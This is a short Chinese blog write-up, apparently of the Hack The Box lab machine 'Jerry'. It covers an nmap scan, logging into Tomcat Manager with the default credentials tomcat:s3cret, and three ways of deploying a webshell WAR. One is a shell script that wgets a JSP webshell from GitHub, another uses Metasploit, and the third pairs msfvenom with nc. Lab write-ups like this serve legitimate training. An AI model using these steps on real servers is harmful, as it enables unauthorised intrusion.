关于渗透测试:HTBJerry

easy box.

首先nmap开路:

找到8080端口:

Tomcat字典:
https://raw.githubusercontent…
找到弱口令tomcat:s3cret

部署war包:
办法1:
官网walkthrough上的:

#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war 

部署wshell:

门路比拟深

拿到flag

办法2:
msf应用multi/http/tomcat_mgr_upload



办法3:
msfvenom生成war包

上传war包后nc:

【腾讯云】云产品限时秒杀,爆款1核2G云服务器,首年50元

阿里云限时活动-2核2G-5M带宽-60G SSD-1000G月流量 ,特惠价99元/年(原价1234.2元/年,可以直接买3年),速抢

本文由乐趣区整理发布,转载请注明出处,谢谢。

You may also like...

发表评论

邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据